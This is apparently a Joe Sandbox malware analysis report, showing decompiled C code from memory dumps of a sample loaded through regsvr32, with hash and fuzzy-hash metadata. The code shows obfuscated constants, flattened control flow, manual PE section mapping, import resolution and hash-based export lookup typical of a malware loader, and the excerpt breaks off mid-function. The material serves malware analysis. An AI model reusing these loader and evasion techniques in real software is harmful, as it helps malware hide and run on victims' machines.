                                                                                                                				_v16 = _v16 ^ 0x015fd144;
                                                                                                                				_v48 = 0x5c7317;
                                                                                                                				_v48 = _v48 + 0x2561;
                                                                                                                				_v48 = _v48 >> 4;
                                                                                                                				_v48 = _v48 ^ 0x000c68f4;
                                                                                                                				_v28 = 0x8ef4ad;
                                                                                                                				_v28 = _v28 ^ 0xa976e87b;
                                                                                                                				_v28 = _v28 >> 3;
                                                                                                                				_v28 = _v28 ^ 0x153dfc46;
                                                                                                                				_v60 = 0x8a842;
                                                                                                                				_v60 = _v60 ^ 0xdacadb1b;
                                                                                                                				_v60 = _v60 | 0xa04112f3;
                                                                                                                				_v60 = _v60 << 0xf;
                                                                                                                				_v60 = _v60 ^ 0xb9f08aa1;
                                                                                                                				_v64 = 0xd1270a;
                                                                                                                				_v64 = _v64 + 0xbf80;
                                                                                                                				_v64 = _v64 | 0x6afaafef;
                                                                                                                				_v64 = _v64 ^ 0x6af66c1f;
                                                                                                                				_v12 = 0x1fa114;
                                                                                                                				_v12 = _v12 * 0x49;
                                                                                                                				_v12 = _v12 ^ 0x090ed9d7;
                                                                                                                				_v4 = 0x9c35f;
                                                                                                                				_v4 = _v4 * 0x51;
                                                                                                                				_v4 = _v4 ^ 0x0311d9d7;
                                                                                                                				_v56 = 0x814c44;
                                                                                                                				_v56 = _v56 << 7;
                                                                                                                				_v56 = _v56 / _t176;
                                                                                                                				_v56 = _v56 + 0xffffc6bb;
                                                                                                                				_v56 = _v56 ^ 0x00c0ba42;
                                                                                                                				_v8 = 0x6e86c8;
                                                                                                                				_v8 = _v8 + 0xffffea82;
                                                                                                                				_v8 = _v8 ^ 0x006e5917;
                                                                                                                				_v20 = 0x646204;
                                                                                                                				_v20 = _v20 * 0x2e;
                                                                                                                				_v20 = _v20 * 0x79;
                                                                                                                				_v20 = _v20 ^ 0x8682de61;
                                                                                                                				_v52 = 0xb78ba6;
                                                                                                                				_v52 = _v52 | 0x1172f08c;
                                                                                                                				_v52 = _v52 + 0xffff11ae;
                                                                                                                				_v52 = _v52 * 0xe;
                                                                                                                				_v52 = _v52 ^ 0xfb877c4c;
                                                                                                                				_v24 = 0x8957ec;
                                                                                                                				_v24 = _v24 << 0x10;
                                                                                                                				_v24 = _v24 + 0xffff1064;
                                                                                                                				_v24 = _v24 ^ 0x57e46da3;
                                                                                                                				_t177 = _v44;
                                                                                                                				_t162 = E001B24A1(_v44, _v68, _a12, _v16, _v48);
                                                                                                                				_t172 = _t162;
                                                                                                                				_t201 =  &(( &_v68)[9]);
                                                                                                                				if(_t172 != 0) {
                                                                                                                					_t192 = E001A427C(_v28, _v60, _v32, _v64, _t177, _v12,  *((intOrPtr*)(_t172 + 0x50)), _v40 | _v36);
                                                                                                                					_t202 =  &(_t201[6]);
                                                                                                                					if(_t192 == 0) {
                                                                                                                						L6:
                                                                                                                						return _t192;
                                                                                                                					}
                                                                                                                					E001BFD42( *((intOrPtr*)(_t172 + 0x54)), _v4,  *_t199, _v56, _t192, _v8);
                                                                                                                					_t203 =  &(_t202[4]);
                                                                                                                					_t197 = ( *(_t172 + 0x14) & 0x0000ffff) + 0x18 + _t172;
                                                                                                                					_t174 = ( *(_t172 + 6) & 0x0000ffff) * 0x28 + _t197;
                                                                                                                					while(_t197 < _t174) {
                                                                                                                						_t181 =  <  ?  *((void*)(_t197 + 8)) :  *((intOrPtr*)(_t197 + 0x10));
                                                                                                                						E001BFD42( <  ?  *((void*)(_t197 + 8)) :  *((intOrPtr*)(_t197 + 0x10)), _v20,  *_t199 +  *((intOrPtr*)(_t197 + 0x14)), _v52,  *((intOrPtr*)(_t197 + 0xc)) + _t192, _v24);
                                                                                                                						_t203 =  &(_t203[4]);
                                                                                                                						_t197 = _t197 + 0x28;
                                                                                                                					}
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				return _t162;
                                                                                                                			}































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 7s$a%
                                                                                                                • API String ID: 0-3959665897
                                                                                                                • Opcode ID: beca20e54f3b74eb281645ddaea50704b02d72558b78ea1c942aa823cec2d618
                                                                                                                • Instruction ID: 81eeaa88ea4efc64641500297a7da4e879c5d8ed956002dac862384000f95de5
                                                                                                                • Opcode Fuzzy Hash: beca20e54f3b74eb281645ddaea50704b02d72558b78ea1c942aa823cec2d618
                                                                                                                • Instruction Fuzzy Hash: 9571F0B14083809FC754CF65C98A80BFBF1BBC9718F408A1DF99596260D3B6DA49CF06
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001AA4DE(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                				char _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				unsigned int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				void* _t107;
                                                                                                                				signed int _t122;
                                                                                                                				signed int _t129;
                                                                                                                				signed int _t130;
                                                                                                                				void* _t133;
                                                                                                                				signed int* _t149;
                                                                                                                				signed int* _t152;
                                                                                                                
                                                                                                                				_push(_a12);
                                                                                                                				_t148 = _a8;
                                                                                                                				_t149 = __ecx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t107);
                                                                                                                				_v100 = 0x598f0a;
                                                                                                                				_t152 =  &(( &_v104)[5]);
                                                                                                                				_v100 = _v100 + 0x90c;
                                                                                                                				_v100 = _v100 + 0xffff1cfa;
                                                                                                                				_t133 = 0x1725ccf;
                                                                                                                				_t129 = 0x70;
                                                                                                                				_v100 = _v100 * 7;
                                                                                                                				_v100 = _v100 ^ 0x026cf370;
                                                                                                                				_v76 = 0x85bbdb;
                                                                                                                				_v76 = _v76 / _t129;
                                                                                                                				_v76 = _v76 ^ 0x0002add3;
                                                                                                                				_v92 = 0xcaa684;
                                                                                                                				_v92 = _v92 + 0x49a3;
                                                                                                                				_v92 = _v92 | 0xf2b87ee2;
                                                                                                                				_v92 = _v92 ^ 0xf2f9927d;
                                                                                                                				_v104 = 0x763e62;
                                                                                                                				_v104 = _v104 << 9;
                                                                                                                				_v104 = _v104 + 0xffff6747;
                                                                                                                				_v104 = _v104 + 0xffff4578;
                                                                                                                				_v104 = _v104 ^ 0xec7df451;
                                                                                                                				_v96 = 0xa571ea;
                                                                                                                				_v96 = _v96 >> 0xb;
                                                                                                                				_v96 = _v96 >> 5;
                                                                                                                				_v96 = _v96 ^ 0x0001f3aa;
                                                                                                                				_v88 = 0xfa8d8d;
                                                                                                                				_v88 = _v88 + 0x74a2;
                                                                                                                				_v88 = _v88 + 0xffff2337;
                                                                                                                				_v88 = _v88 ^ 0x00f9aa9f;
                                                                                                                				_v68 = 0x578ecb;
                                                                                                                				_t130 = 0x17;
                                                                                                                				_v68 = _v68 * 0x2f;
                                                                                                                				_v68 = _v68 ^ 0x10191973;
                                                                                                                				_v72 = 0x30831e;
                                                                                                                				_v72 = _v72 ^ 0x00cbf604;
                                                                                                                				_v72 = _v72 ^ 0x00f6e6f7;
                                                                                                                				_v80 = 0x6bf173;
                                                                                                                				_v80 = _v80 ^ 0x93da2fca;
                                                                                                                				_v80 = _v80 ^ 0x93b48c18;
                                                                                                                				_v84 = 0xa0e436;
                                                                                                                				_v84 = _v84 >> 0xd;
                                                                                                                				_v84 = _v84 ^ 0x000f436d;
                                                                                                                				_v60 = 0x6f9b5b;
                                                                                                                				_v60 = _v60 * 0x3c;
                                                                                                                				_v60 = _v60 ^ 0x1a232cb8;
                                                                                                                				_v64 = 0x302d4c;
                                                                                                                				_v64 = _v64 / _t130;
                                                                                                                				_v64 = _v64 ^ 0x000e0659;
                                                                                                                				do {
                                                                                                                					while(_t133 != 0x5e1249) {
                                                                                                                						if(_t133 == 0x1725ccf) {
                                                                                                                							_t133 = 0x9f730cf;
                                                                                                                							 *_t149 =  *_t149 & 0x00000000;
                                                                                                                							_t149[1] = _v100;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t133 == 0x4ffe1a5) {
                                                                                                                								_push(_t133);
                                                                                                                								_t122 = E001A303A(_t133, _t149[1]);
                                                                                                                								_t152 =  &(_t152[3]);
                                                                                                                								 *_t149 = _t122;
                                                                                                                								__eflags = _t122;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t133 = 0x5e1249;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t133 == 0x58ab1cc) {
                                                                                                                									E001A4E8F(_t148 + 4,  &_v56, __eflags, _v60, _v64);
                                                                                                                								} else {
                                                                                                                									if(_t133 == 0x9f730cf) {
                                                                                                                										_t149[1] = E001BF9AF(_t148);
                                                                                                                										_t133 = 0x4ffe1a5;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t133 != 0xa873648) {
                                                                                                                											goto L13;
                                                                                                                										} else {
                                                                                                                											E001AE4D8(_v80,  *_t148,  &_v56, _v84);
                                                                                                                											_t152 =  &(_t152[2]);
                                                                                                                											_t133 = 0x58ab1cc;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L16:
                                                                                                                						__eflags =  *_t149;
                                                                                                                						_t106 =  *_t149 != 0;
                                                                                                                						__eflags = _t106;
                                                                                                                						return 0 | _t106;
                                                                                                                					}
                                                                                                                					E001A6DD9( &_v56, _v88, _v68, _t149, _v72);
                                                                                                                					_t152 =  &(_t152[3]);
                                                                                                                					_t133 = 0xa873648;
                                                                                                                					L13:
                                                                                                                					__eflags = _t133 - 0x2d97a4d;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L16;
                                                                                                                			}
                                                                                                                0x001aa761
                                                                                                                0x001aa761
                                                                                                                0x001aa722
                                                                                                                0x001aa727
                                                                                                                0x001aa72a
                                                                                                                0x001aa72f
                                                                                                                0x001aa72f
                                                                                                                0x001aa72f
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: L-0$b>v
                                                                                                                • API String ID: 0-2557773390
                                                                                                                • Opcode ID: 02d4e96a6b00c6bfb40fd27bc6dae8a6bd038d84f847921e912e914f7a37eef0
                                                                                                                • Instruction ID: 633a85ae451e98338e55f8af1958cf9362b87c2ca162c005f8ca826d17c48383
                                                                                                                • Opcode Fuzzy Hash: 02d4e96a6b00c6bfb40fd27bc6dae8a6bd038d84f847921e912e914f7a37eef0
                                                                                                                • Instruction Fuzzy Hash: D45173B5508342ABC758CF20C88982BBBE1FFC5718F90491DF58A96220D3B59A49CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001A7013(void* __ecx, void* __edx) {
                                                                                                                				void* _t98;
                                                                                                                				void* _t110;
                                                                                                                				signed short _t117;
                                                                                                                				signed short _t118;
                                                                                                                				signed short _t120;
                                                                                                                				signed int _t122;
                                                                                                                				signed int _t123;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t126;
                                                                                                                				intOrPtr _t139;
                                                                                                                				signed short _t141;
                                                                                                                				signed short* _t144;
                                                                                                                				signed short _t145;
                                                                                                                				intOrPtr _t146;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                
                                                                                                                				_t146 =  *((intOrPtr*)(_t147 + 0x2c));
                                                                                                                				_push(_t146);
                                                                                                                				_push( *((intOrPtr*)(_t147 + 0x34)));
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t98);
                                                                                                                				 *((intOrPtr*)(_t147 + 0x44)) = 0x3159ec;
                                                                                                                				_t148 = _t147 + 0x10;
                                                                                                                				_t122 = 0x1f;
                                                                                                                				 *(_t148 + 0x34) =  *(_t148 + 0x34) * 0x32;
                                                                                                                				 *(_t148 + 0x34) =  *(_t148 + 0x34) / _t122;
                                                                                                                				 *(_t148 + 0x34) =  *(_t148 + 0x34) >> 5;
                                                                                                                				 *(_t148 + 0x34) =  *(_t148 + 0x34) ^ 0x00027ccb;
                                                                                                                				 *(_t148 + 0x24) = 0x9b15dc;
                                                                                                                				 *(_t148 + 0x24) =  *(_t148 + 0x24) >> 9;
                                                                                                                				 *(_t148 + 0x24) =  *(_t148 + 0x24) ^ 0x000f893d;
                                                                                                                				 *(_t148 + 0x14) = 0x385dec;
                                                                                                                				_t22 = _t148 + 0x14; // 0x385dec
                                                                                                                				_t123 = 0x15;
                                                                                                                				 *(_t148 + 0x14) =  *_t22 / _t123;
                                                                                                                				 *(_t148 + 0x14) =  *(_t148 + 0x14) | 0x08b1afd6;
                                                                                                                				 *(_t148 + 0x14) =  *(_t148 + 0x14) + 0xf2f9;
                                                                                                                				 *(_t148 + 0x14) =  *(_t148 + 0x14) ^ 0x08b16093;
                                                                                                                				 *(_t148 + 0x20) = 0xa93290;
                                                                                                                				 *(_t148 + 0x20) =  *(_t148 + 0x20) >> 0xa;
                                                                                                                				 *(_t148 + 0x20) =  *(_t148 + 0x20) ^ 0x0004909a;
                                                                                                                				 *(_t148 + 0x10) = 0xf8492e;
                                                                                                                				 *(_t148 + 0x10) =  *(_t148 + 0x10) << 2;
                                                                                                                				 *(_t148 + 0x10) =  *(_t148 + 0x10) | 0x56178f72;
                                                                                                                				 *(_t148 + 0x10) =  *(_t148 + 0x10) + 0x80e9;
                                                                                                                				 *(_t148 + 0x10) =  *(_t148 + 0x10) ^ 0x57f90806;
                                                                                                                				 *(_t148 + 0x18) = 0x86f050;
                                                                                                                				_t124 = 0x4c;
                                                                                                                				 *(_t148 + 0x18) =  *(_t148 + 0x18) / _t124;
                                                                                                                				 *(_t148 + 0x18) =  *(_t148 + 0x18) | 0x4ac7de04;
                                                                                                                				 *(_t148 + 0x18) =  *(_t148 + 0x18) ^ 0x1efe84d7;
                                                                                                                				 *(_t148 + 0x18) =  *(_t148 + 0x18) ^ 0x5435c767;
                                                                                                                				 *(_t148 + 0x28) = 0x19b075;
                                                                                                                				 *(_t148 + 0x28) =  *(_t148 + 0x28) + 0xffff671e;
                                                                                                                				 *(_t148 + 0x28) =  *(_t148 + 0x28) ^ 0x0014fd64;
                                                                                                                				 *(_t148 + 0x1c) = 0x6484a0;
                                                                                                                				_t125 = 0x5e;
                                                                                                                				 *(_t148 + 0x1c) =  *(_t148 + 0x1c) / _t125;
                                                                                                                				 *(_t148 + 0x1c) =  *(_t148 + 0x1c) + 0xffff0d22;
                                                                                                                				 *(_t148 + 0x1c) =  *(_t148 + 0x1c) ^ 0x0001be00;
                                                                                                                				_t126 =  *(_t148 + 0x34);
                                                                                                                				_t110 =  *((intOrPtr*)(_t146 + 0x3c)) + _t146;
                                                                                                                				_t139 =  *((intOrPtr*)(_t110 + 0x78 + _t126 * 8));
                                                                                                                				if(_t139 == 0 ||  *((intOrPtr*)(_t110 + 0x7c + _t126 * 8)) == 0) {
                                                                                                                					L13:
                                                                                                                					return 1;
                                                                                                                				} else {
                                                                                                                					_t145 = _t139 + _t146;
                                                                                                                					while(1) {
                                                                                                                						_t113 =  *((intOrPtr*)(_t145 + 0xc));
                                                                                                                						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						_t141 = E001A31EA( *((intOrPtr*)(_t148 + 0x30)),  *(_t148 + 0x20),  *(_t148 + 0x28), _t113 + _t146,  *(_t148 + 0x10));
                                                                                                                						_t148 = _t148 + 0xc;
                                                                                                                						 *(_t148 + 0x34) = _t141;
                                                                                                                						__eflags = _t141;
                                                                                                                						if(_t141 == 0) {
                                                                                                                							L15:
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						_t144 =  *_t145 + _t146;
                                                                                                                						_t120 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
                                                                                                                						while(1) {
                                                                                                                							_t117 =  *_t144;
                                                                                                                							__eflags = _t117;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(__eflags >= 0) {
                                                                                                                								_t129 = _t146 + 2 + _t117;
                                                                                                                								__eflags = _t146 + 2 + _t117;
                                                                                                                							} else {
                                                                                                                								_t129 = _t117 & 0x0000ffff;
                                                                                                                							}
                                                                                                                							_t118 = E001C1DA1(_t129,  *(_t148 + 0x24), _t141,  *((intOrPtr*)(_t148 + 0x2c)),  *(_t148 + 0x1c));
                                                                                                                							_t148 = _t148 + 0xc;
                                                                                                                							__eflags = _t118;
                                                                                                                							if(_t118 == 0) {
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_t141 =  *(_t148 + 0x34);
                                                                                                                								_t144 =  &(_t144[2]);
                                                                                                                								 *_t120 = _t118;
                                                                                                                								_t120 = _t120 + 4;
                                                                                                                								__eflags = _t120;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t145 = _t145 + 0x14;
                                                                                                                						__eflags = _t145;
                                                                                                                					}
                                                                                                                					goto L13;
                                                                                                                				}
                                                                                                                			}




















                                                                                                                0x001a71bc
                                                                                                                0x001a71bf
                                                                                                                0x001a71c1
                                                                                                                0x001a71c1
                                                                                                                0x00000000
                                                                                                                0x001a71c1
                                                                                                                0x001a71b6
                                                                                                                0x001a71ca
                                                                                                                0x001a71ca
                                                                                                                0x001a71ca
                                                                                                                0x00000000
                                                                                                                0x001a71cd

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Y1$]8
                                                                                                                • API String ID: 0-3302549726
                                                                                                                • Opcode ID: 570eec4fe22fb7e64ec8a49df5c19a0d57e10de8d951410669059738569a32ea
                                                                                                                • Instruction ID: 707a5e8bf2846155d58c92905dacae37c01bf8e2bab5de87d9efd8b4f3aa4e7a
                                                                                                                • Opcode Fuzzy Hash: 570eec4fe22fb7e64ec8a49df5c19a0d57e10de8d951410669059738569a32ea
                                                                                                                • Instruction Fuzzy Hash: 105197716093029FD358DF24C98592BBBF1FBD4B18F54882CF88586261D7B0DA19CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001A9343(void* __ecx, void* __edx) {
                                                                                                                				void* _t94;
                                                                                                                				intOrPtr _t107;
                                                                                                                				void* _t114;
                                                                                                                				void* _t120;
                                                                                                                				signed int _t122;
                                                                                                                				signed int _t123;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t145;
                                                                                                                				intOrPtr _t146;
                                                                                                                				intOrPtr _t149;
                                                                                                                				void* _t150;
                                                                                                                				void* _t151;
                                                                                                                
                                                                                                                				_t149 =  *((intOrPtr*)(_t150 + 0x40));
                                                                                                                				_push( *((intOrPtr*)(_t150 + 0x4c)));
                                                                                                                				_push(_t149);
                                                                                                                				_push( *((intOrPtr*)(_t150 + 0x4c)));
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t94);
                                                                                                                				 *((intOrPtr*)(_t150 + 0x44)) = 0x11727c;
                                                                                                                				_t151 = _t150 + 0x14;
                                                                                                                				 *((intOrPtr*)(_t151 + 0x34)) = 0xd380a7;
                                                                                                                				_t146 = 0;
                                                                                                                				 *((intOrPtr*)(_t151 + 0x38)) = 0;
                                                                                                                				 *((intOrPtr*)(_t151 + 0x3c)) = 0;
                                                                                                                				 *(_t151 + 0x14) = 0xf5743f;
                                                                                                                				_t122 = 0x2e;
                                                                                                                				 *(_t151 + 0x18) =  *(_t151 + 0x14) / _t122;
                                                                                                                				 *(_t151 + 0x18) =  *(_t151 + 0x18) | 0x38dd841d;
                                                                                                                				 *(_t151 + 0x18) =  *(_t151 + 0x18) ^ 0x38ddd61d;
                                                                                                                				 *(_t151 + 0x1c) = 0x2e41e7;
                                                                                                                				 *(_t151 + 0x1c) =  *(_t151 + 0x1c) | 0xe5853b54;
                                                                                                                				_t123 = 0x5d;
                                                                                                                				 *(_t151 + 0x1c) =  *(_t151 + 0x1c) / _t123;
                                                                                                                				 *(_t151 + 0x1c) =  *(_t151 + 0x1c) ^ 0x0279d652;
                                                                                                                				 *(_t151 + 0x14) = 0x325fdf;
                                                                                                                				 *(_t151 + 0x14) =  *(_t151 + 0x14) ^ 0x3c7cb417;
                                                                                                                				 *(_t151 + 0x14) =  *(_t151 + 0x14) + 0x92cf;
                                                                                                                				_t124 = 0x31;
                                                                                                                				 *(_t151 + 0x14) =  *(_t151 + 0x14) * 0x7f;
                                                                                                                				 *(_t151 + 0x14) =  *(_t151 + 0x14) ^ 0xeb601870;
                                                                                                                				 *(_t151 + 0x20) = 0xa2848;
                                                                                                                				 *(_t151 + 0x20) =  *(_t151 + 0x20) / _t124;
                                                                                                                				 *(_t151 + 0x20) =  *(_t151 + 0x20) ^ 0x0006e433;
                                                                                                                				 *(_t151 + 0x4c) = 0x76882c;
                                                                                                                				_t125 = 0x78;
                                                                                                                				 *(_t151 + 0x4c) =  *(_t151 + 0x4c) / _t125;
                                                                                                                				_t126 = 0x63;
                                                                                                                				 *(_t151 + 0x48) =  *(_t151 + 0x4c) / _t126;
                                                                                                                				 *(_t151 + 0x48) =  *(_t151 + 0x48) << 5;
                                                                                                                				 *(_t151 + 0x48) =  *(_t151 + 0x48) ^ 0x000f1331;
                                                                                                                				_t107 =  *((intOrPtr*)(_t149 + 0x3c));
                                                                                                                				_t145 =  *(_t151 + 0x14);
                                                                                                                				 *((intOrPtr*)(_t151 + 0x2c)) = _t107;
                                                                                                                				_t120 =  *((intOrPtr*)(_t107 + _t149 + 0x78)) + _t149;
                                                                                                                				 *((intOrPtr*)(_t151 + 0x28)) =  *((intOrPtr*)(_t120 + 0x1c)) + _t149;
                                                                                                                				_t128 =  *((intOrPtr*)(_t120 + 0x20)) + _t149;
                                                                                                                				 *(_t151 + 0x20) =  *((intOrPtr*)(_t120 + 0x20)) + _t149;
                                                                                                                				 *((intOrPtr*)(_t151 + 0x24)) =  *((intOrPtr*)(_t120 + 0x24)) + _t149;
                                                                                                                				while(_t145 <  *((intOrPtr*)(_t120 + 0x18))) {
                                                                                                                					_t114 = E001B9635( *((intOrPtr*)(_t151 + 0x24)),  *(_t151 + 0x1c),  *((intOrPtr*)(_t128 + _t145 * 4)) + _t149,  *((intOrPtr*)(_t151 + 0x24)),  *(_t151 + 0x48),  *(_t151 + 0x48));
                                                                                                                					_t151 = _t151 + 0x10;
                                                                                                                					if(_t114 == 0) {
                                                                                                                						_t146 =  *((intOrPtr*)( *((intOrPtr*)(_t151 + 0x28)) + ( *( *((intOrPtr*)(_t151 + 0x24)) + _t145 * 2) & 0x0000ffff) * 4)) + _t149;
                                                                                                                						if(_t146 >= _t120) {
                                                                                                                							_t146 =  <  ? 0 : _t146;
                                                                                                                						}
                                                                                                                						L7:
                                                                                                                						return _t146;
                                                                                                                					}
                                                                                                                					_t128 =  *(_t151 + 0x20);
                                                                                                                					_t145 = _t145 + 1;
                                                                                                                				}
                                                                                                                				goto L7;
                                                                                                                			}


















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: H($A.
                                                                                                                • API String ID: 0-2251998262
                                                                                                                • Opcode ID: 369bf18cad9c9a825925ee672bc48449f96ee962289b027eed8e27e2b62fd5b7
                                                                                                                • Instruction ID: e13c776992775645f89a7f841878581d9cbbee0605ea102ef79f915831015a75
                                                                                                                • Opcode Fuzzy Hash: 369bf18cad9c9a825925ee672bc48449f96ee962289b027eed8e27e2b62fd5b7
                                                                                                                • Instruction Fuzzy Hash: 6A414671A083019FC308CF29D98451BBBF2EBC9748F00892DF99897251C776EA598F96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001B6E97(void* __ecx) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				void* _t113;
                                                                                                                				void* _t117;
                                                                                                                				signed int _t119;
                                                                                                                				intOrPtr _t131;
                                                                                                                				intOrPtr* _t132;
                                                                                                                				intOrPtr _t133;
                                                                                                                				signed int* _t135;
                                                                                                                
                                                                                                                				_t135 =  &_v56;
                                                                                                                				_v8 = 0x279e49;
                                                                                                                				_t131 =  *0x1c420c; // 0x67d5d8
                                                                                                                				_v4 = 0;
                                                                                                                				_t117 = __ecx;
                                                                                                                				_v44 = 0xa926c9;
                                                                                                                				_t132 = _t131 + 0x18;
                                                                                                                				_v44 = _v44 + 0xef81;
                                                                                                                				_t119 = 0x30;
                                                                                                                				_v44 = _v44 / _t119;
                                                                                                                				_v44 = _v44 ^ 0x00038b21;
                                                                                                                				_v20 = 0xd92ca0;
                                                                                                                				_v20 = _v20 >> 0xd;
                                                                                                                				_v20 = _v20 ^ 0x0000a0c2;
                                                                                                                				_v24 = 0x34a947;
                                                                                                                				_v24 = _v24 >> 3;
                                                                                                                				_v24 = _v24 ^ 0x0007f166;
                                                                                                                				_v48 = 0x7ae245;
                                                                                                                				_v48 = _v48 + 0xf278;
                                                                                                                				_v48 = _v48 >> 0xb;
                                                                                                                				_v48 = _v48 ^ 0x0004ce87;
                                                                                                                				_v52 = 0x9ed5b7;
                                                                                                                				_v52 = _v52 >> 4;
                                                                                                                				_v52 = _v52 >> 0xc;
                                                                                                                				_v52 = _v52 ^ 0x0008c24b;
                                                                                                                				_v36 = 0xdf8ab9;
                                                                                                                				_v36 = _v36 + 0xbf2b;
                                                                                                                				_v36 = _v36 * 0x17;
                                                                                                                				_v36 = _v36 ^ 0x142dddc0;
                                                                                                                				_v40 = 0xa226c0;
                                                                                                                				_v40 = _v40 | 0xca7af793;
                                                                                                                				_v40 = _v40 ^ 0x80d1dff2;
                                                                                                                				_v40 = _v40 ^ 0x4a259152;
                                                                                                                				_v28 = 0x6eaddd;
                                                                                                                				_v28 = _v28 >> 5;
                                                                                                                				_v28 = _v28 ^ 0x2530fcd0;
                                                                                                                				_v28 = _v28 ^ 0x25385ebf;
                                                                                                                				_v16 = 0xea9281;
                                                                                                                				_v16 = _v16 + 0xffffa671;
                                                                                                                				_v16 = _v16 ^ 0x00e46cff;
                                                                                                                				_v32 = 0x2e7d6d;
                                                                                                                				_v32 = _v32 * 6;
                                                                                                                				_v32 = _v32 + 0xe407;
                                                                                                                				_v32 = _v32 ^ 0x0112753d;
                                                                                                                				_v56 = 0x9d81e1;
                                                                                                                				_v56 = _v56 * 0x1b;
                                                                                                                				_v56 = _v56 | 0xafd50898;
                                                                                                                				_v56 = _v56 * 0x1a;
                                                                                                                				_v56 = _v56 ^ 0x7c8ea9af;
                                                                                                                				_v12 = 0x871404;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x2e68c54b;
                                                                                                                				while(1) {
